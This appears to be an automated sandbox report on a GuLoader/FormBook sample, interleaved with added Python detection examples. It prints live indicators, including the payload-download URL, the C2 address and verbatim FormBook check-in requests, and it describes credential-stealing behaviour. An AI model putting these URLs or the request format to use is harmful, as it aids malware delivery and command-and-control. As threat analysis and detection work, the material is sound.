Windows Analysis Report Zr26f1rL6r.exe

Overview

General Information

Sample Name: Zr26f1rL6r.exe
Analysis ID: 528518
MD5: 812181df251e06433bf2f4f6a0c0f0f4
SHA1: aa38a567ee48483d98966622fd320c791bc45871
SHA256: 4d6c910a379d00f329e55ad98a7817de0370695566443a74a9a02c85d2463a9d

Detection

GuLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to resolve many domain names, but no domain seems valid
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://atseasonals.com/GHrtt/bin_k"}
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}
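The two configurations above carry different kinds of indicator, and treating every hostname in them as a blocklist entry is a mistake: FormBook sends check-ins to its one real C2 (the "C2 list" entry) interleaved with identical requests to the "decoy" domains, which are unrelated third-party sites, and that is exactly what the HTTP section further down shows. The Python below is an added example, not part of the Joe Sandbox report or of either malware family's code. It takes the extracted configuration (decoy list trimmed to the hosts actually contacted in this analysis), sorts observed hostnames into real C2, GuLoader stager, decoy and unknown, and pulls out the shared URI path, which is the indicator worth alerting on. The observed-host list in the usage block is constructed from this report.

```python
from urllib.parse import urlsplit

# Configurations as extracted by the sandbox (copied from this report). The decoy
# list is a subset of the 64 entries above, limited to the hosts that received
# check-ins in the HTTP section plus braxtynmi.xyz from the DNS section.
GULOADER_CFG = {"Payload URL": "https://atseasonals.com/GHrtt/bin_k"}
FORMBOOK_CFG = {
    "C2 list": ["www.ayudavida.com/n8ds/"],
    "decoy": [
        "topwowshopping.store", "growebox.com", "stylesbykee.com", "inklusion.online",
        "mackthetruck.com", "helpcloud.xyz", "ozattaos.xyz", "unitedmetal-saudi.com",
        "divorcefearfreedom.com", "jamiecongedo.com", "lopsrental.lease", "braxtynmi.xyz",
    ],
}


def host_of(entry: str) -> str:
    """Reduce a config entry ('www.x.com/n8ds/' or a full URL) to a lowercase hostname."""
    if "://" not in entry:
        entry = "http://" + entry          # FormBook stores its C2 without a scheme
    return urlsplit(entry).hostname.lower()


def strip_www(host: str) -> str:
    """FormBook prepends 'www.' to every host it contacts; compare on the bare name."""
    return host[4:] if host.startswith("www.") else host


def c2_uri_paths(formbook_cfg=FORMBOOK_CFG) -> set:
    """The request path shared by real and decoy check-ins: the most stable network IOC."""
    return {urlsplit("http://" + e).path for e in formbook_cfg["C2 list"]}


def triage(observed_hosts, formbook_cfg=FORMBOOK_CFG, guloader_cfg=GULOADER_CFG) -> dict:
    """Partition hosts from DNS/HTTP telemetry into real C2, stager, decoy and unknown."""
    c2 = {strip_www(host_of(e)) for e in formbook_cfg["C2 list"]}
    stager = {strip_www(host_of(guloader_cfg["Payload URL"]))}
    decoys = {strip_www(host_of(e)) for e in formbook_cfg["decoy"]}
    buckets = {"c2": set(), "stager": set(), "decoy": set(), "unknown": set()}
    for host in observed_hosts:
        bare = strip_www(host.lower())
        if bare in c2:
            buckets["c2"].add(host)
        elif bare in stager:
            buckets["stager"].add(host)
        elif bare in decoys:
            buckets["decoy"].add(host)
        else:
            buckets["unknown"].add(host)
    return buckets


if __name__ == "__main__":
    # Constructed from the DNS and HTTP observations in this report, plus one
    # unrelated host to show the 'unknown' bucket.
    seen = ["www.ayudavida.com", "www.growebox.com", "atseasonals.com",
            "www.braxtynmi.xyz", "update.example.org"]
    for bucket, hosts in triage(seen).items():
        print(f"{bucket:8s} {sorted(hosts)}")
    print("alert on path:", c2_uri_paths())
```

Only the "c2" and "stager" buckets belong on a blocklist; decoy hits are useful as evidence that a host is infected, not as indicators in their own right. The `/n8ds/` path with the two-parameter query is what ties all of the check-ins together regardless of destination.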
Multi AV Scanner detection for submitted file
Source: Zr26f1rL6r.exe Virustotal: Detection: 40%
Source: Zr26f1rL6r.exe ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.jamiecongedo.com/n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exe ReversingLabs: Detection: 20%
Antivirus or Machine Learning detection for unpacked file
Source: 15.2.rundll32.exe.488796c.4.unpack Avira: Label: TR/Dropper.Gen
Source: 15.2.rundll32.exe.540a58.0.unpack Avira: Label: TR/Dropper.Gen
Source: 25.0.firefox.exe.4009796c.0.unpack Avira: Label: TR/Dropper.Gen
Source: 25.0.firefox.exe.4009796c.1.unpack Avira: Label: TR/Dropper.Gen
Source: 25.2.firefox.exe.4009796c.0.unpack Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: Zr26f1rL6r.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49841 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: c8ahotgz8h.exe, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdb source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0040FA90 FindFirstFileW,FindNextFileW,FindClose, 15_2_0040FA90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0040FA89 FindFirstFileW,FindNextFileW,FindClose, 15_2_0040FA89

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 172.67.164.153:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49824 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49836 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49843 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 88.99.22.5 80
Source: C:\Windows\explorer.exe Network Connect: 172.120.157.187 80
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 116.62.216.226 80
Source: C:\Windows\explorer.exe Network Connect: 172.67.164.153 80
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe Network Connect: 104.21.76.223 80
Source: C:\Windows\explorer.exe Network Connect: 66.29.140.185 80
Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
Source: C:\Windows\explorer.exe Network Connect: 81.2.194.128 80
Source: C:\Windows\explorer.exe Network Connect: 203.170.80.250 80
Source: C:\Windows\explorer.exe Network Connect: 164.155.212.139 80
Source: C:\Windows\explorer.exe Network Connect: 136.143.191.204 80
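These connections originate from explorer.exe and from a rundll32.exe started without arguments (see the Sigma hit above); neither opens HTTP sessions to public hosts on its own, so this is FormBook's migration into a system process rather than normal shell activity. As an added example, not from the report or from any EDR product, the Python below applies that rule to constructed events in a reduced Sysmon Event ID 3 (network connection) shape, using destinations listed above. The field names, the `allow_dest` parameter and the two benign control events are assumptions.

```python
import ipaddress
from pathlib import PureWindowsPath

# Constructed events in a reduced Sysmon Event ID 3 shape. The first three copy
# connections recorded in this report; the last two are benign controls (SMB to an
# internal server, a real browser) that the rule must not flag.
EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "DestinationIp": "3.64.163.50",
     "DestinationPort": 80, "Initiated": True},
    {"Image": r"C:\Windows\explorer.exe", "DestinationIp": "104.21.76.223",
     "DestinationPort": 80, "Initiated": True},
    {"Image": r"C:\Windows\SysWOW64\rundll32.exe", "DestinationIp": "116.62.216.226",
     "DestinationPort": 80, "Initiated": True},
    {"Image": r"C:\Windows\explorer.exe", "DestinationIp": "192.168.11.5",
     "DestinationPort": 445, "Initiated": True},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "DestinationIp": "107.6.148.162",
     "DestinationPort": 443, "Initiated": True},
]

# Signed system binaries that should never originate web sessions to arbitrary public
# hosts. explorer.exe and rundll32.exe are the two this sample used; extend the set
# with whatever other system images your FormBook samples migrate into.
SYSTEM_IMAGES = {"explorer.exe", "rundll32.exe"}
WEB_PORTS = {80, 443, 8080, 8443}


def is_public(ip: str) -> bool:
    """True for routable unicast addresses; private, loopback, link-local etc. are excluded."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def system_process_web_egress(events, allow_dest=frozenset()):
    """Return (image, dst_ip, dst_port) for outbound web connections made by system images.

    allow_dest is an assumed allowlist of destination IPs (your proxy, known Microsoft
    endpoints) used to suppress the little legitimate noise explorer.exe produces.
    """
    alerts = []
    for ev in events:
        image = PureWindowsPath(ev["Image"]).name.lower()
        if image not in SYSTEM_IMAGES or not ev.get("Initiated", True):
            continue
        dst_ip, dst_port = ev["DestinationIp"], int(ev["DestinationPort"])
        if dst_port not in WEB_PORTS or not is_public(dst_ip) or dst_ip in allow_dest:
            continue
        alerts.append((image, dst_ip, dst_port))
    return alerts


if __name__ == "__main__":
    for image, ip, port in system_process_web_egress(EVENTS):
        print(f"ALERT {image} -> {ip}:{port}")
```

The public-address check keeps SMB and intranet traffic from explorer.exe out of the result, and the allowlist is where a proxy address goes in environments that force all web traffic through one; without that hook the rule fires on every proxied request from these images.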
Performs DNS queries to domains with low reputation
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.helpcloud.xyz
Source: DNS query: www.ozattaos.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
Source: DNS query: www.braxtynmi.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://atseasonals.com/GHrtt/bin_k
Source: Malware configuration extractor URLs: www.ayudavida.com/n8ds/
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.tvterradafarinha.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.aubzo7o9fm.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.koedayuuki.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.recoverytrivia.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.wordpresshostingblog.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.abcjanitorialsolutions.com reply code: Server failure (2, SERVFAIL)
Source: unknown DNS traffic detected: query: www.recruitresumelibrary.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.testwebsite0711.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.diamota.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.braxtynmi.xyz reply code: Server failure (2, SERVFAIL)
Source: unknown DNS traffic detected: query: www.learncodeing.com reply code: Name error (3, NXDOMAIN)
Source: unknown DNS traffic detected: query: www.3uwz9mpxk77g.biz reply code: Server failure (2, SERVFAIL)
Source: unknown DNS traffic detected: query: www.photon4energy.com reply code: Name error (3, NXDOMAIN)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.topwowshopping.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.growebox.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.ayudavida.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.stylesbykee.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.inklusion.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.mackthetruck.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1 | Host: www.helpcloud.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1 | Host: www.ozattaos.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1 | Host: www.inklusion.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1 | Host: www.unitedmetal-saudi.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.inklusion.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.mackthetruck.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1 | Host: www.divorcefearfreedom.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1 | Host: www.jamiecongedo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.lopsrental.lease | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.inklusion.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1 | Host: www.mackthetruck.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
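Every request above has the same skeleton: a GET to a one-directory path, one query parameter carrying a 68-character base64-like blob and a second short token, only Host and Connection: close as headers, no User-Agent, and seven NUL bytes sent after the header block. The Python below is an added example, not the ET Snort rules referenced earlier and not code from the report; it checks a raw request for those traits and counts them. The two positive samples copy requests from this section, the negative sample is constructed, and the threshold of three traits is an assumption.

```python
import re
from urllib.parse import urlsplit

# Constructed sample requests. The first two reproduce check-ins listed above; the
# third is an ordinary browser request that the check must leave alone.
SAMPLES = [
    b"GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1\r\n"
    b"Host: www.topwowshopping.store\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00",
    b"GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1\r\n"
    b"Host: www.divorcefearfreedom.com\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00",
    b"GET /index.html HTTP/1.1\r\nHost: example.org\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n",
]

# Standard-alphabet base64 of at least 60 characters; the blobs above are unpadded.
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{60,}={0,2}$")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, body); header names lowercased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def formbook_checkin_indicators(raw: bytes) -> list:
    """Return the FormBook check-in traits present in one request (empty list = none)."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    # Split the query by hand: parse_qsl would turn '+' inside the blob into a space.
    params = [p.partition("=")[::2] for p in url.query.split("&") if p]
    reasons = []
    if method == "GET" and "user-agent" not in headers:
        reasons.append("GET without User-Agent")
    if set(headers) <= {"host", "connection"} and headers.get("connection", "").lower() == "close":
        reasons.append("only Host and Connection: close headers")
    if (url.path.count("/") == 2 and url.path.endswith("/") and len(params) == 2
            and sum(1 for _, v in params if BLOB_RE.match(v)) == 1):
        reasons.append("one-directory path with one base64-like and one short parameter")
    if body and body.strip(b"\x00") == b"":
        reasons.append(f"{len(body)} NUL bytes after the headers of a GET")
    return reasons


def is_formbook_like(raw: bytes, min_hits: int = 3) -> bool:
    """Assumed threshold: three of the four traits together is a confident match."""
    return len(formbook_checkin_indicators(raw)) >= min_hits


if __name__ == "__main__":
    for raw in SAMPLES:
        host = parse_request(raw)[2].get("host", "?")
        print(host, is_formbook_like(raw), formbook_checkin_indicators(raw))
```

The path and parameter names (`/n8ds/`, `6ldD`, `v6Mt`, `5jp`, `2dfPiT`) are campaign specific and rotate, so the check keys on the shape rather than on those strings; a GET with no User-Agent on its own is also produced by some scripted clients, which is why a single trait is not enough to alert.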
IP address seen in connection with other malware
